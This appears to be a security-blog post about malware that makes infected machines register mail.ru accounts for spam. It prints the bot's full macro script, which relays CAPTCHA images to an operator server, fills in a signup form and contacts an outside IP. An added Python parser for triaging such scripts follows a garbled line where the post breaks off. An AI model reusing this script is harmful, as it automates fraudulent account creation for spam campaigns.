
Just an observation, nothing earth-shattering: we're seeing infected systems automatically registering mail.ru accounts for use in spamming.

The spammers use infected machines to sign up for webmail accounts at mail.ru. We saw the same thing about a year and a half ago with Yahoo! Mail accounts. A trivial little script runs on the infected machine and registers the account:

!GOTO http://www.mail.ru/ www.mail.ru 80
!SLEEP 5
!GOTOLINKTEXT win.mail.ru 80 /cgi-bin/signup win.mail.ru/cgi-bin/signup
!SAVEIMG MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/uppic.php get_image?id= http://win.mail.ru/cgi-bin/ mailru 1
!SLEEP 200
!GETCODE MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/piccode.php mailru
!POST win.mail.ru 80 /cgi-bin/ reg"
ID [_HIDDEN_]
Count [_HIDDEN_]
back [_HIDDEN_]
Username [redacted]
RegistrationDomain mail.ru
Password [redacted]
Password_Verify [redacted]
Password_Question %CD%EE%EC%E5%F0+%EF%E0%F1%EF%EE%F0%F2a
Password_CustomQuestion [NULL]
Password_Answer [redacted]

Email [NULL]
FirstName Maks
LastName M
BirthDay 9
BirthMonth 9
BirthYear 1965
Sex 1
Mrim.Country 123
Mrim.Region 0
mra1 0
security_image_id [_HIDDEN_]
security_image_answer [PICCODE]
B1 +%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC+%EF%EE%F7%F2%EE%E2%FB%E9+%FF%F9%E8%EA+
!PARSE MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/check.php msglist?folder 430 5
!GOTO http://66.235.181.25[portions redacted] 66.235.181.25 80
!GOTO http://win.mail.ru/cgi-bin/logout win.mail.ru 80
!FIN

Then, they post the account information back to the controlling server:

Spambot192888888888
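As an added example (not from the original post and not the bot's own tooling), here is a small Python triage parser for the macro format shown above. It separates the hosts the bot abuses from the steps that relay data to the operator's server (the MY_MACRO_WEB_SERV placeholder: CAPTCHA image upload, solved-code fetch, mailbox check) and lists the form fields the bot fills at run time, such as the CAPTCHA answer. Which argument position names the contacted host for each command is an assumption read off this single capture.

```python
# Constructed sample in the same "!COMMAND args" macro format as the captured
# script above (values shortened; runtime placeholders kept as the bot writes them).
SAMPLE = """\
!GOTO http://www.mail.ru/ www.mail.ru 80
!SAVEIMG MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/uppic.php get_image?id= http://win.mail.ru/cgi-bin/ mailru 1
!GETCODE MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/piccode.php mailru
!POST win.mail.ru 80 /cgi-bin/reg
Username [redacted]
security_image_id [_HIDDEN_]
security_image_answer [PICCODE]
!PARSE MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/check.php msglist?folder 430 5
!GOTO http://win.mail.ru/cgi-bin/logout win.mail.ru 80
!FIN
"""

# Index of the argument naming the contacted host, per command (assumed from this capture).
HOST_ARG = {"GOTO": 1, "GOTOLINKTEXT": 0, "POST": 0, "SAVEIMG": 0, "GETCODE": 0, "PARSE": 0}
CONTROLLER = "MY_MACRO_WEB_SERV"  # placeholder the bot replaces with its operator's server

def parse_macro(text):
    """Split the macro into steps; non-'!' lines following a !POST are its form fields."""
    steps = []
    for line in (ln.strip() for ln in text.splitlines()):
        if line.startswith("!"):
            cmd, *args = line[1:].split()
            steps.append({"cmd": cmd, "args": args, "form": {}})
        elif line and steps and steps[-1]["cmd"] == "POST":
            key, _, value = line.partition(" ")
            steps[-1]["form"][key] = value
    return steps

def hosts_by_role(steps):
    """Separate the abused target hosts from the steps that relay data to the operator."""
    target, relay = set(), []
    for s in steps:
        idx = HOST_ARG.get(s["cmd"])
        if idx is None or idx >= len(s["args"]):
            continue  # SLEEP, FIN, or a truncated line
        if s["args"][idx] == CONTROLLER:
            relay.append((s["cmd"], s["args"][2] if len(s["args"]) > 2 else ""))  # cmd, operator-side path
        else:
            target.add(s["args"][idx])
    return target, relay

def runtime_fields(steps):
    """Form fields filled at run time: [_HIDDEN_] scraped from the page, [PICCODE] from the solver."""
    return {k: v.strip("[]") for s in steps if s["cmd"] == "POST"
            for k, v in s["form"].items() if v.startswith("[") and v.isupper()}
```

Run against a real capture, the relay list gives the operator-side endpoints worth blocking or alerting on, while the target set tells you which provider's signup flow is being abused.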

Alex Eckelberry
(Thanks Adam Thomas)